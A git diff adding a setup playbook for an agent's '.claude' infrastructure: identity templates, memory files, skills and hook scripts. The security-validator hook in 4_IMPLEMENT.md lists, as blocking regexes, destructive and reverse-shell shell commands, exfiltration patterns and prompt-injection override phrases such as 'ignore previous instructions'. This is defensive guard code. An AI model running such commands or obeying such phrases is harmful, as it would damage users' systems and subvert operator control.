diff --git a/.gitignore b/.gitignore index c5ad508..c61649a 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ Auto\ Run\ Docs/ +*.DS_Store diff --git a/Setup/Claude-Cognitive-Infrastructure/0_INITIALIZE.md b/Setup/Claude-Cognitive-Infrastructure/0_INITIALIZE.md new file mode 100644 index 0000000..af10989 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/0_INITIALIZE.md @@ -0,0 +1,74 @@ +# Phase 0: Initialize + +## Objective + +Validate prerequisites and prepare for Claude Cognitive Infrastructure deployment. + +## Prerequisites Checklist + +### 1. Target Directory + +Verify the target agent directory: + +- [ ] Agent directory exists and is writable +- [ ] Directory has a clear name indicating agent purpose +- [ ] No critical files will be overwritten (or backup is acceptable) + +### 2. Existing Infrastructure Check + +Check for existing `.claude/` directory: + +- [ ] If `.claude/` exists, determine upgrade vs fresh install +- [ ] If upgrading, backup existing memory files +- [ ] Note any custom configurations to preserve + +### 3. Agent Context + +Gather information about the agent: + +- [ ] Agent name (from directory name) +- [ ] Organization (from parent directory, if applicable) +- [ ] Agent type/role (inferred from name or existing files) + +## Agent Type Detection + +Based on directory name, detect agent type for customization: + +| Keywords in Name | Agent Type | Persona Suggestion | +|------------------|------------|-------------------| +| Sales, Lead, Pipeline | Sales | Scout | +| Engineer, Architect, Developer | Technical | Archon | +| Research, Analysis | Research | Sage | +| Marketing, Content | Marketing | Maven | +| Fundraising, Investor | Finance | Catalyst | +| Operations, Admin | Operations | Atlas | +| People, Recruiting, HR | People | Harbor | +| Executive, Chief | Executive | Aria | +| Brand, Communications | Communications | Echo | +| Strategy, Planning | Strategy | Compass | +| Customer, Success | Customer | Bridge | +| UX, Design | Design | Pixel | + +## Validation Steps + +1. Confirm agent directory path +2. Check write permissions +3. Detect agent type from name +4. Check for existing infrastructure +5. Determine installation mode (fresh/upgrade) + +## Installation Modes + +### Fresh Install +- Create complete `.claude/` structure +- Generate new CLAUDE.md identity +- Initialize empty memory files + +### Upgrade Install +- Preserve existing memory files +- Update structure to latest version +- Add new capabilities (hooks, skills) + +## Next Phase + +Once prerequisites are validated, proceed to **1_ANALYZE.md** to analyze the agent context. diff --git a/Setup/Claude-Cognitive-Infrastructure/1_ANALYZE.md b/Setup/Claude-Cognitive-Infrastructure/1_ANALYZE.md new file mode 100644 index 0000000..ecdc941 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/1_ANALYZE.md @@ -0,0 +1,106 @@ +# Phase 1: Analyze Agent Context + +## Objective + +Analyze the target agent's context to determine appropriate identity, skills, and configuration. + +## Analysis Tasks + +### 1. Directory Analysis + +Examine the agent directory: + +- [ ] Read directory name for agent purpose +- [ ] Check parent directory for organization context +- [ ] Look for existing ROLE.md or similar documentation +- [ ] Identify any existing configuration files + +### 2. Agent Identity Derivation + +From the directory name, derive: + +| Component | Source | Example | +|-----------|--------|---------| +| Agent Name | Directory name | "Sales Lead Agent" | +| Organization | Parent directory | "Wayward Guardian" | +| Persona Name | Generated from type | "Scout" | +| Agent Type | Keywords in name | "Sales" | + +### 3. Role Detection + +If ROLE.md exists, extract: + +- Role description (first paragraph after title) +- Key responsibilities (bulleted lists) +- Domain expertise areas +- Integration points with other agents + +### 4. Existing Files Inventory + +Check for files that inform configuration: + +| File | Purpose | Action | +|------|---------|--------| +| ROLE.md | Role definition | Extract responsibilities | +| README.md | Documentation | Extract context | +| .claude/ | Existing infrastructure | Plan upgrade | +| auto-run/ | Playbooks | Note for integration | + +## Agent Profile Template + +Based on analysis, build agent profile: + +```yaml +agent: + name: "" + persona: "" + organization: "" + type: "" + +identity: + mission: "" + role: "<2-3 sentence role description>" + +capabilities: + primary: [] # Core responsibilities + secondary: [] # Supporting tasks + +integrations: + collaborates_with: [] # Other agents + tools: [] # External tools +``` + +## Analysis Outputs + +Document the following for use in later phases: + +1. **Agent Profile** - Complete identity information +2. **Installation Mode** - Fresh or upgrade +3. **Customizations Needed** - Based on agent type +4. **Preservation List** - Files to keep if upgrading + +## Type-Specific Considerations + +### Technical Agents +- Include architecture context directories +- Add development and testing contexts +- Consider code-related hooks + +### Business Agents +- Include projects context +- Add working context for active tasks +- Consider CRM/pipeline integrations + +### Research Agents +- Emphasize knowledge context +- Add research methodology +- Consider web search capabilities + +### Operations Agents +- Include process documentation +- Add tracking and reporting +- Consider scheduling integrations + +## Next Phase + +Proceed to **2_PLAN_STRUCTURE.md** to plan the infrastructure structure. diff --git a/Setup/Claude-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md b/Setup/Claude-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md new file mode 100644 index 0000000..7b6a718 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/2_PLAN_STRUCTURE.md @@ -0,0 +1,200 @@ +# Phase 2: Plan Structure + +## Objective + +Plan the complete Claude Cognitive Infrastructure directory structure for the agent. + +## Core Directory Structure + +``` +/ +├── CLAUDE.md # Agent identity file +└── .claude/ + ├── VERSION # Infrastructure version (1.1.0) + ├── settings.json # Hook and behavior settings + ├── config/ + │ └── config.yaml # Runtime configuration + ├── skills/ + │ └── CORE/ + │ └── SKILL.md # Core agent skill + ├── context/ + │ ├── CLAUDE.md # Context system documentation + │ ├── memory/ + │ │ ├── learnings.md # Accumulated knowledge + │ │ ├── user_preferences.md # User working style + │ │ └── work_status.md # Current task tracking + │ ├── architecture/ + │ │ └── CLAUDE.md # Architecture context + │ ├── design/ + │ │ └── CLAUDE.md # Design principles + │ ├── development/ + │ │ └── CLAUDE.md # Development context + │ ├── projects/ + │ │ └── CLAUDE.md # Project configs + │ ├── testing/ + │ │ └── CLAUDE.md # Testing guidelines + │ ├── tools/ + │ │ └── CLAUDE.md # Tool documentation + │ └── working/ + │ └── CLAUDE.md # Working context + ├── hooks/ + │ └── CLAUDE.md # Hooks documentation + ├── agents/ + │ └── CLAUDE.md # Agent definitions + ├── scripts/ + │ └── CLAUDE.md # Utility scripts + └── examples/ + └── CLAUDE.md # Reference examples +``` + +## File Contents Plan + +### CLAUDE.md (Root Identity) + +```markdown +# : + +## Your Name +Your name is ****. You are the for . + +## Your Mission + + +## Your Role + + +## Core Responsibilities + + +## Memory Management +**CRITICAL:** Update work_status.md after EVERY conversation turn. + +## Organization Context + +``` + +### settings.json + +```json +{ + "hooks": { + "preToolCall": [], + "postToolCall": [], + "notification": [] + }, + "permissions": { + "tools": ["Read", "Write", "Edit", "Bash", "Glob", "Grep"] + } +} +``` + +### VERSION + +``` +1.1.0 +``` + +### config/config.yaml + +```yaml +version: "1.1.0" +agent: + name: "" + persona: "" + type: "" +settings: + memory_update_frequency: "every_turn" + context_loading: "progressive" +``` + +### CORE/SKILL.md + +```markdown +--- +name: CORE +version: 1.0.0 +priority: 100 +triggers: + - identity + - who are you + - what do you do +context_budget: 5000 +--- + +# : Core Identity + +## Overview + + +## Primary Functions + + +## Working Style + +``` + +### Memory Files + +**learnings.md:** +```markdown +# Learnings + +Facts and knowledge accumulated about users, organization, and domain. + +## Users + +## Organization + +## Domain Knowledge +``` + +**user_preferences.md:** +```markdown +# User Preferences + +Working style and preferences for interactions. + +## Communication Style + +## Working Hours + +## Preferences +``` + +**work_status.md:** +```markdown +# Work Status + +Current tasks and progress tracking. + +## Active Tasks + +## Pending Items + +## Recently Completed + +--- +*Last updated: * +``` + +## Context Placeholder Files + +Each context subdirectory gets a CLAUDE.md placeholder: + +```markdown +# Context + +This directory contains information. + +## Contents + + + +## Usage + + +``` + +## Next Phase + +Proceed to **3_EVALUATE.md** to evaluate the planned structure. diff --git a/Setup/Claude-Cognitive-Infrastructure/3_EVALUATE.md b/Setup/Claude-Cognitive-Infrastructure/3_EVALUATE.md new file mode 100644 index 0000000..40ae120 --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/3_EVALUATE.md @@ -0,0 +1,95 @@ +# Phase 3: Evaluate Plan + +## Objective + +Evaluate the infrastructure plan for completeness, correctness, and safety. + +## Evaluation Checklist + +### 1. Identity Completeness + +- [ ] Agent name is clear and descriptive +- [ ] Persona name is short and memorable +- [ ] Mission statement is concise (one sentence) +- [ ] Role description explains purpose (2-3 sentences) +- [ ] Responsibilities are specific and actionable + +### 2. Structure Completeness + +- [ ] All required directories planned +- [ ] All required files identified +- [ ] Memory files initialized with proper structure +- [ ] CORE skill has appropriate triggers + +### 3. Configuration Validity + +- [ ] settings.json is valid JSON +- [ ] config.yaml is valid YAML +- [ ] VERSION file contains valid semver +- [ ] File paths are correct + +### 4. Content Quality + +- [ ] CLAUDE.md follows standard template +- [ ] SKILL.md has valid frontmatter +- [ ] Memory update instruction is present +- [ ] Organization context is included + +### 5. Safety Checks + +- [ ] No existing files will be overwritten without backup +- [ ] No sensitive data in templates +- [ ] Permissions are appropriate +- [ ] No destructive operations planned + +## Validation Matrix + +| Component | Required | Planned | Valid | +|-----------|----------|---------|-------| +| CLAUDE.md | Yes | | | +| .claude/ | Yes | | | +| settings.json | Yes | | | +| VERSION | Yes | | | +| config/config.yaml | Yes | | | +| skills/CORE/SKILL.md | Yes | | | +| context/memory/ | Yes | | | +| context/CLAUDE.md | Yes | | | +| hooks/ | Yes | | | + +## Risk Assessment + +### Low Risk +- Creating new directories +- Creating new files in empty locations +- Adding placeholder CLAUDE.md files + +### Medium Risk +- Overwriting existing CLAUDE.md +- Modifying existing settings.json + +### High Risk (Require Confirmation) +- Overwriting existing memory files +- Deleting existing content +- Modifying existing skills + +## Pre-Implementation Checklist + +Before proceeding to implementation: + +- [ ] All directories identified +- [ ] All file contents drafted +- [ ] Agent identity finalized +- [ ] Backup plan for existing files (if applicable) +- [ ] No blocking issues identified + +## Approval Gate + +Implementation can proceed when: +1. All required components are planned +2. All content passes validation +3. No high-risk operations without mitigation +4. Structure matches infrastructure specification + +## Next Phase + +If evaluation passes, proceed to **4_IMPLEMENT.md** to execute the installation. diff --git a/Setup/Claude-Cognitive-Infrastructure/4_IMPLEMENT.md b/Setup/Claude-Cognitive-Infrastructure/4_IMPLEMENT.md new file mode 100644 index 0000000..812c0ff --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/4_IMPLEMENT.md @@ -0,0 +1,970 @@ +# Phase 4: Implement Installation + +## Objective + +Execute the complete Claude Cognitive Infrastructure installation including the Hook System, Memory System, and Skills System. + +--- + +## Part 1: Directory Structure + +### Step 1.1: Create Base Directory Tree + +```bash +mkdir -p .claude/{config,hooks/lib,agents,scripts,examples} +mkdir -p .claude/skills/{CORE/{SYSTEM,USER,Workflows},CreateSkill} +mkdir -p .claude/MEMORY/{State,Signals,Work,Learning/{OBSERVE,THINK,PLAN,BUILD,EXECUTE,VERIFY}} +mkdir -p .claude/MEMORY/{research,sessions,learnings,decisions,execution,security,recovery,raw-outputs,backups} +``` + +### Step 1.2: Create VERSION File + +```bash +echo "1.1.0" > .claude/VERSION +``` + +--- + +## Part 2: Hook System + +The Hook System provides event-driven automation that fires at key lifecycle points. + +### Step 2.1: Create settings.json + +Create `.claude/settings.json`: + +```json +{ + "hooks": { + "SessionStart": [ + { + "matcher": "*", + "hooks": [ + { + "type": "command", + "command": "bun run .claude/hooks/initialize-session.ts" + }, + { + "type": "command", + "command": "bun run .claude/hooks/load-core-context.ts" + } + ] + } + ], + "PreToolUse": [ + { + "matcher": "Bash", + "hooks": [ + { + "type": "command", + "command": "bun run .claude/hooks/security-validator.ts" + } + ] + } + ], + "PostToolUse": [ + { + "matcher": "*", + "hooks": [ + { + "type": "command", + "command": "bun run .claude/hooks/event-logger.ts" + } + ] + } + ], + "Stop": [ + { + "matcher": "*", + "hooks": [ + { + "type": "command", + "command": "bun run .claude/hooks/session-summary.ts" + } + ] + } + ] + }, + "permissions": { + "tools": ["Read", "Write", "Edit", "Bash", "Glob", "Grep", "WebFetch", "WebSearch", "Task"] + } +} +``` + +### Step 2.2: Create Security Validator Hook + +Create `.claude/hooks/security-validator.ts`: + +```typescript +#!/usr/bin/env bun +// Security validator - PreToolUse hook for Bash commands +// Validates commands and blocks dangerous operations + +interface PreToolUsePayload { + session_id: string; + tool_name: string; + tool_input: Record; +} + +// Attack pattern categories - 10 tiers of protection +const ATTACK_PATTERNS = { + // Tier 1: Catastrophic - Always block + catastrophic: { + patterns: [ + /rm\s+(-rf?|--recursive)\s+[\/~]/i, + /rm\s+(-rf?|--recursive)\s+\*/i, + />\s*\/dev\/sd[a-z]/i, + /mkfs\./i, + /dd\s+if=.*of=\/dev/i, + ], + action: 'block', + message: 'BLOCKED: Catastrophic deletion/destruction detected' + }, + + // Tier 2: Reverse shells - Always block + reverseShell: { + patterns: [ + /bash\s+-i\s+>&\s*\/dev\/tcp/i, + /nc\s+(-e|--exec)\s+\/bin\/(ba)?sh/i, + /python.*socket.*connect/i, + /perl.*socket.*connect/i, + /ruby.*TCPSocket/i, + /php.*fsockopen/i, + /socat.*exec/i, + /\|\s*\/bin\/(ba)?sh/i, + ], + action: 'block', + message: 'BLOCKED: Reverse shell pattern detected' + }, + + // Tier 3: Credential theft - Always block + credentialTheft: { + patterns: [ + /curl.*\|\s*(ba)?sh/i, + /wget.*\|\s*(ba)?sh/i, + /curl.*(-o|--output).*&&.*chmod.*\+x/i, + /base64\s+-d.*\|\s*(ba)?sh/i, + ], + action: 'block', + message: 'BLOCKED: Remote code execution pattern detected' + }, + + // Tier 4: Prompt injection indicators - Block and log + promptInjection: { + patterns: [ + /ignore\s+(all\s+)?previous\s+instructions/i, + /disregard\s+(all\s+)?prior\s+instructions/i, + /you\s+are\s+now\s+(in\s+)?[a-z]+\s+mode/i, + /new\s+instruction[s]?:/i, + /system\s+prompt:/i, + /\[INST\]/i, + /<\|im_start\|>/i, + ], + action: 'block', + message: 'BLOCKED: Prompt injection pattern detected' + }, + + // Tier 5: Environment manipulation - Warn + envManipulation: { + patterns: [ + /export\s+(ANTHROPIC|OPENAI|AWS|AZURE)_/i, + /echo\s+\$\{?(ANTHROPIC|OPENAI)_/i, + /env\s*\|.*KEY/i, + /printenv.*KEY/i, + ], + action: 'warn', + message: 'WARNING: Environment/credential access detected' + }, + + // Tier 6: Git dangerous operations - Require confirmation + gitDangerous: { + patterns: [ + /git\s+push.*(-f|--force)/i, + /git\s+reset\s+--hard/i, + /git\s+clean\s+-fd/i, + /git\s+checkout\s+--\s+\./i, + ], + action: 'warn', + message: 'WARNING: Potentially destructive git operation' + }, + + // Tier 7: System modification - Log + systemMod: { + patterns: [ + /chmod\s+777/i, + /chown\s+root/i, + /sudo\s+/i, + /systemctl\s+(stop|disable)/i, + ], + action: 'log', + message: 'LOGGED: System modification command' + }, + + // Tier 8: Network operations - Log + network: { + patterns: [ + /ssh\s+/i, + /scp\s+/i, + /rsync.*:/i, + /curl\s+(-X\s+POST|--data)/i, + ], + action: 'log', + message: 'LOGGED: Network operation' + }, + + // Tier 9: Data exfiltration patterns - Block + exfiltration: { + patterns: [ + /curl.*(@|--upload-file)/i, + /tar.*\|.*curl/i, + /zip.*\|.*nc/i, + ], + action: 'block', + message: 'BLOCKED: Data exfiltration pattern detected' + }, + + // Tier 10: Infrastructure protection - Block + infraProtection: { + patterns: [ + /rm.*\.claude/i, + /rm.*\.config/i, + ], + action: 'block', + message: 'BLOCKED: Infrastructure protection triggered' + } +}; + +function validateCommand(command: string): { allowed: boolean; message?: string; action?: string } { + if (!command || command.length < 3) { + return { allowed: true }; + } + + for (const [tierName, tier] of Object.entries(ATTACK_PATTERNS)) { + for (const pattern of tier.patterns) { + if (pattern.test(command)) { + console.error(`[Security] ${tierName}: ${tier.message}`); + console.error(`[Security] Command: ${command.substring(0, 100)}...`); + return { + allowed: tier.action !== 'block', + message: tier.message, + action: tier.action + }; + } + } + } + + return { allowed: true }; +} + +async function main() { + try { + const stdinData = await Bun.stdin.text(); + if (!stdinData.trim()) { + process.exit(0); + } + + const payload: PreToolUsePayload = JSON.parse(stdinData); + + if (payload.tool_name !== 'Bash') { + process.exit(0); + } + + const command = payload.tool_input?.command; + if (!command) { + process.exit(0); + } + + const validation = validateCommand(command); + + if (!validation.allowed) { + console.log(validation.message); + console.log(`Command blocked: ${command.substring(0, 100)}...`); + process.exit(2); // Exit code 2 signals block to Claude Code + } + + if (validation.action === 'warn') { + console.log(validation.message); + } + + } catch (error) { + console.error('Security validator error:', error); + } + + process.exit(0); +} + +main(); +``` + +### Step 2.3: Create Initialize Session Hook + +Create `.claude/hooks/initialize-session.ts`: + +```typescript +#!/usr/bin/env bun +// Initialize session - SessionStart hook +// Sets up session state and loads initial context + +import { writeFileSync, existsSync, mkdirSync } from 'fs'; + +const MEMORY_DIR = '.claude/MEMORY'; +const STATE_DIR = `${MEMORY_DIR}/State`; + +async function main() { + try { + // Ensure directories exist + if (!existsSync(STATE_DIR)) { + mkdirSync(STATE_DIR, { recursive: true }); + } + + // Initialize or update session state + const sessionState = { + session_id: `session_${Date.now()}`, + started_at: new Date().toISOString(), + status: 'active' + }; + + writeFileSync( + `${STATE_DIR}/active-session.json`, + JSON.stringify(sessionState, null, 2) + ); + + console.log(`Session initialized: ${sessionState.session_id}`); + + } catch (error) { + console.error('Session initialization error:', error); + } +} + +main(); +``` + +### Step 2.4: Create Load Core Context Hook + +Create `.claude/hooks/load-core-context.ts`: + +```typescript +#!/usr/bin/env bun +// Load core context - SessionStart hook +// Loads CORE skill content at session start + +import { readFileSync, existsSync } from 'fs'; + +const CORE_SKILL_PATH = '.claude/skills/CORE/SKILL.md'; + +async function main() { + try { + if (existsSync(CORE_SKILL_PATH)) { + const content = readFileSync(CORE_SKILL_PATH, 'utf-8'); + // Output to stdout for context injection + console.log('--- CORE CONTEXT LOADED ---'); + console.log(content); + console.log('--- END CORE CONTEXT ---'); + } + } catch (error) { + console.error('Context loading error:', error); + } +} + +main(); +``` + +### Step 2.5: Create Event Logger Hook + +Create `.claude/hooks/event-logger.ts`: + +```typescript +#!/usr/bin/env bun +// Event logger - PostToolUse hook +// Logs tool executions to MEMORY + +import { appendFileSync, existsSync, mkdirSync } from 'fs'; + +const RAW_OUTPUT_DIR = '.claude/MEMORY/raw-outputs'; + +interface PostToolUsePayload { + session_id: string; + tool_name: string; + tool_input: Record; + tool_output?: string; +} + +async function main() { + try { + const stdinData = await Bun.stdin.text(); + if (!stdinData.trim()) { + process.exit(0); + } + + const payload: PostToolUsePayload = JSON.parse(stdinData); + + // Ensure directory exists + if (!existsSync(RAW_OUTPUT_DIR)) { + mkdirSync(RAW_OUTPUT_DIR, { recursive: true }); + } + + // Create log entry + const logEntry = { + timestamp: new Date().toISOString(), + session_id: payload.session_id, + tool_name: payload.tool_name, + tool_input: payload.tool_input + }; + + // Append to daily log file + const today = new Date().toISOString().split('T')[0]; + const logFile = `${RAW_OUTPUT_DIR}/${today}.jsonl`; + + appendFileSync(logFile, JSON.stringify(logEntry) + '\n'); + + } catch (error) { + // Silent fail - logging should never break execution + } +} + +main(); +``` + +### Step 2.6: Create Session Summary Hook + +Create `.claude/hooks/session-summary.ts`: + +```typescript +#!/usr/bin/env bun +// Session summary - Stop hook +// Captures session summary when session ends + +import { writeFileSync, readFileSync, existsSync, mkdirSync } from 'fs'; + +const SESSIONS_DIR = '.claude/MEMORY/sessions'; +const STATE_DIR = '.claude/MEMORY/State'; + +async function main() { + try { + // Ensure directory exists + if (!existsSync(SESSIONS_DIR)) { + mkdirSync(SESSIONS_DIR, { recursive: true }); + } + + // Read active session state + const sessionFile = `${STATE_DIR}/active-session.json`; + let sessionId = 'unknown'; + let startedAt = new Date().toISOString(); + + if (existsSync(sessionFile)) { + const state = JSON.parse(readFileSync(sessionFile, 'utf-8')); + sessionId = state.session_id || sessionId; + startedAt = state.started_at || startedAt; + } + + // Create session summary + const summary = { + session_id: sessionId, + started_at: startedAt, + ended_at: new Date().toISOString(), + status: 'completed' + }; + + // Save to sessions directory + const filename = `${SESSIONS_DIR}/${sessionId}.json`; + writeFileSync(filename, JSON.stringify(summary, null, 2)); + + console.log(`Session summary saved: ${filename}`); + + } catch (error) { + console.error('Session summary error:', error); + } +} + +main(); +``` + +--- + +## Part 3: Memory System + +The Memory System provides persistent knowledge across sessions using a three-tier architecture. + +### Step 3.1: Create MEMORY README + +Create `.claude/MEMORY/README.md`: + +```markdown +# MEMORY System + +Persistent memory architecture for session history, learnings, and operational state. + +## Directory Structure + +| Directory | Purpose | Retention | +|-----------|---------|-----------| +| `research/` | Deep research outputs | Permanent | +| `sessions/` | Session summaries (auto-captured) | Rolling 90 days | +| `learnings/` | Learning moments | Permanent | +| `decisions/` | Architectural Decision Records | Permanent | +| `execution/` | Task execution logs | Rolling 30 days | +| `security/` | Security event logs | Permanent | +| `recovery/` | Recovery snapshots | Rolling 7 days | +| `raw-outputs/` | JSONL event streams | Rolling 7 days | +| `backups/` | Pre-refactoring backups | As needed | +| `State/` | Current operational state | Active | +| `Signals/` | Pattern detection | Active | +| `Work/` | Per-task memory | Active | +| `Learning/` | Phase-based learnings | Permanent | + +## Three-Tier Memory Model + +### 1. CAPTURE (Hot) - Per-Task Work + +Current work items in `Work/[Task-Name_TIMESTAMP]/`: +- `Work.md` - Goal, result, signal tracking +- `TRACE.jsonl` - Decision trace +- `Output/` - Deliverables produced + +### 2. SYNTHESIS (Warm) - Aggregated Learning + +Learnings organized by phase in `Learning/`: +- `OBSERVE/` - Context gathering learnings +- `THINK/` - Hypothesis generation learnings +- `PLAN/` - Execution planning learnings +- `BUILD/` - Success criteria learnings +- `EXECUTE/` - Implementation learnings +- `VERIFY/` - Verification learnings + +### 3. APPLICATION (Cold) - Archived History + +Historical data organized by date in main directories. + +## Privacy + +Add to .gitignore: +\`\`\` +.claude/MEMORY/raw-outputs/ +.claude/MEMORY/sessions/ +.claude/MEMORY/security/ +\`\`\` +``` + +### Step 3.2: Initialize State Files + +Create `.claude/MEMORY/State/active-work.json`: + +```json +{ + "current_task": null, + "started_at": null, + "status": "idle" +} +``` + +### Step 3.3: Initialize Signal Files + +Create `.claude/MEMORY/Signals/README.md`: + +```markdown +# Signals + +Real-time pattern detection and anomaly tracking. + +## Signal Files + +| File | Purpose | +|------|---------| +| `failures.jsonl` | VERIFY failures with context | +| `loopbacks.jsonl` | Phase loopback events | +| `patterns.jsonl` | Weekly aggregated patterns | + +## Format + +Each file uses JSONL (JSON Lines) format - one JSON object per line. +``` + +--- + +## Part 4: Skills System + +The Skills System provides modular domain expertise with tiered loading. + +### Step 4.1: Create CORE Skill + +Create `.claude/skills/CORE/SKILL.md`: + +```markdown +--- +name: CORE +description: Core identity and configuration. AUTO-LOADS at session start. USE WHEN session begins OR user asks about identity, capabilities, or how the agent works. +--- + +# CORE - Agent Identity + +**Auto-loads at session start.** This skill defines agent identity and core operating principles. + +## Examples + +**Example: Identity query** +\`\`\` +User: "Who are you?" +-> Reads CORE skill +-> Returns identity information +\`\`\` + +**Example: Capability check** +\`\`\` +User: "What can you do?" +-> Lists available capabilities +-> References other skills if installed +\`\`\` + +--- + +## Identity + +**Agent:** +**Role:** +**Organization:** + +--- + +## Available Capabilities + +- **Memory System**: Persistent knowledge across sessions +- **Skills Framework**: Modular domain expertise +- **Hook System**: Event-driven automation +- **Context System**: Structured knowledge by domain + +--- + +## Quick Reference + +- Skills directory: `.claude/skills/` +- Memory directory: `.claude/MEMORY/` +- Configuration: `.claude/settings.json` +``` + +### Step 4.2: Create Skill System Documentation + +Create `.claude/skills/CORE/SYSTEM/SKILLSYSTEM.md`: + +```markdown +# Custom Skill System + +The configuration system for all skills. + +## Skill Structure + +Every skill follows this structure: + +\`\`\` +SkillName/ +├── SKILL.md # Main skill file (required) +├── Context.md # Additional context (optional) +├── Tools/ # CLI tools +│ └── ToolName.ts +└── Workflows/ # Execution workflows + └── WorkflowName.md +\`\`\` + +## SKILL.md Format + +### YAML Frontmatter + +\`\`\`yaml +--- +name: SkillName +description: [What it does]. USE WHEN [intent triggers]. [Additional capabilities]. +--- +\`\`\` + +**Rules:** +- `name` uses TitleCase +- `description` is a single line +- `USE WHEN` keyword is mandatory for activation +- Max 1024 characters + +### Markdown Body + +\`\`\`markdown +# SkillName + +[Brief description] + +## Workflow Routing + +| Workflow | Trigger | File | +|----------|---------|------| +| **Create** | "create new" | \`Workflows/Create.md\` | + +## Examples + +**Example 1:** +\`\`\` +User: "[Request]" +-> [Action taken] +-> [Result] +\`\`\` +\`\`\` + +## Skill Loading + +1. **Session Start**: Only YAML frontmatter loads for routing +2. **Skill Invocation**: Full SKILL.md body loads +3. **Workflow Execution**: Additional files load on-demand + +## Creating New Skills + +Use the CreateSkill skill or manually create following this structure. +``` + +### Step 4.3: Create CreateSkill Skill + +Create `.claude/skills/CreateSkill/SKILL.md`: + +```markdown +--- +name: CreateSkill +description: Creates new skills following the standard structure. USE WHEN user wants to create a new skill OR add new capability OR needs a custom workflow. +--- + +# CreateSkill + +Creates properly structured skills following the Skills System specification. + +## Workflow Routing + +| Workflow | Trigger | File | +|----------|---------|------| +| **Create** | "create skill", "new skill" | `Workflows/Create.md` | + +## Examples + +**Example: Create a research skill** +\`\`\` +User: "Create a skill for code review" +-> Creates .claude/skills/CodeReview/SKILL.md +-> Adds proper YAML frontmatter with USE WHEN +-> Creates Workflows/ and Tools/ directories +-> Returns confirmation with skill path +\`\`\` + +## Skill Template + +When creating a skill, use this template: + +\`\`\`markdown +--- +name: SkillName +description: [Purpose]. USE WHEN [triggers]. +--- + +# SkillName + +[Description] + +## Workflow Routing + +| Workflow | Trigger | File | +|----------|---------|------| + +## Examples + +**Example:** +\`\`\` +User: "[Request]" +-> [Process] +-> [Result] +\`\`\` +\`\`\` +``` + +### Step 4.4: Create USER Configuration Directory + +Create `.claude/skills/CORE/USER/README.md`: + +```markdown +# USER Configuration + +Personal configuration that customizes agent behavior. + +## Files + +| File | Purpose | +|------|---------| +| `ABOUTME.md` | User background and context | +| `PREFERENCES.md` | Working style preferences | +| `CONTACTS.md` | Contact information | + +## Privacy + +This directory contains personal information. Add to .gitignore if version controlling: + +\`\`\` +.claude/skills/CORE/USER/ +\`\`\` + +## Customization + +Create files as needed to personalize the agent's knowledge about you and your preferences. +``` + +### Step 4.5: Create SYSTEM Documentation Directory + +Create `.claude/skills/CORE/SYSTEM/README.md`: + +```markdown +# SYSTEM Documentation + +System-level documentation for the Claude Cognitive Infrastructure. + +## Files + +| File | Purpose | +|------|---------| +| `SKILLSYSTEM.md` | Skill creation and structure | +| `MEMORYSYSTEM.md` | Memory architecture | +| `HOOKSYSTEM.md` | Event-driven automation | + +## Usage + +These files provide reference documentation. They are loaded on-demand when relevant context is needed. +``` + +--- + +## Part 5: Agent Identity + +### Step 5.1: Create config.yaml + +Create `.claude/config/config.yaml`: + +```yaml +version: "1.1.0" +infrastructure: + name: "Claude Cognitive Infrastructure" + installed: "" + +agent: + name: "" + persona: "" + type: "" + organization: "" + +settings: + memory_update_frequency: "every_turn" + context_loading: "progressive" + skill_activation: "trigger_based" + +capabilities: + memory: true + skills: true + hooks: true + context: true +``` + +### Step 5.2: Create Root CLAUDE.md + +Create `CLAUDE.md` in agent root directory: + +```markdown +# : + +## Your Name + +Your name is ****. You are the for . + +## Your Mission + + + +## Your Role + + + +## Core Responsibilities + +### Primary Functions +- +- +- + +### Supporting Tasks +- +- + +## System Architecture + +You operate within the Claude Cognitive Infrastructure: + +- **Skills Framework** (`.claude/skills/`): Modular domain expertise +- **Memory System** (`.claude/MEMORY/`): Persistent knowledge +- **Hook System** (`.claude/hooks/`): Event-driven automation +- **Configuration** (`.claude/config/`): Runtime settings + +## Memory Management + +**CRITICAL:** Update work status after EVERY conversation turn to maintain continuity. + +- Read relevant memories before starting work +- Update memories after significant interactions +- Keep work status current at `.claude/MEMORY/State/` + +## Organization Context + + + +--- + +*Claude Cognitive Infrastructure v1.1.0* +``` + +--- + +## Part 6: Gitignore Configuration + +### Step 6.1: Create/Update .gitignore + +Add to `.gitignore` in agent root: + +```gitignore +# Claude Cognitive Infrastructure - Private Data +.claude/MEMORY/raw-outputs/ +.claude/MEMORY/sessions/ +.claude/MEMORY/security/ +.claude/MEMORY/State/ +.claude/MEMORY/Signals/ +.claude/MEMORY/Work/ +.claude/skills/CORE/USER/ + +# Keep structure but ignore contents +!.claude/MEMORY/.gitkeep +!.claude/MEMORY/State/.gitkeep +``` + +### Step 6.2: Create .gitkeep Files + +```bash +touch .claude/MEMORY/.gitkeep +touch .claude/MEMORY/State/.gitkeep +touch .claude/MEMORY/Signals/.gitkeep +touch .claude/MEMORY/Work/.gitkeep +touch .claude/MEMORY/Learning/.gitkeep +``` + +--- + +## Post-Implementation Checklist + +After all files are created: + +- [ ] Verify all directories exist +- [ ] Validate JSON syntax in settings.json +- [ ] Validate YAML syntax in config.yaml +- [ ] Ensure hook files are executable (`chmod +x .claude/hooks/*.ts`) +- [ ] Test security validator: `echo '{"tool_name":"Bash","tool_input":{"command":"ls"}}' | bun run .claude/hooks/security-validator.ts` +- [ ] Verify CLAUDE.md has been customized with agent identity +- [ ] Confirm .gitignore excludes sensitive data + +--- + +## Next Phase + +Proceed to **5_VERIFY.md** to verify the installation. diff --git a/Setup/Claude-Cognitive-Infrastructure/5_VERIFY.md b/Setup/Claude-Cognitive-Infrastructure/5_VERIFY.md new file mode 100644 index 0000000..feb24ba --- /dev/null +++ b/Setup/Claude-Cognitive-Infrastructure/5_VERIFY.md @@ -0,0 +1,143 @@ +# Phase 5: Verify Installation + +## Objective + +Verify the Claude Cognitive Infrastructure is correctly installed and functional. + +## Verification Checklist + +### 1. Directory Structure + +Verify all directories exist: + +- [ ] `.claude/` directory exists +- [ ] `.claude/config/` exists +- [ ] `.claude/skills/CORE/` exists +- [ ] `.claude/context/` exists +- [ ] `.claude/context/memory/` exists +- [ ] `.claude/hooks/` exists +- [ ] `.claude/agents/` exists +- [ ] 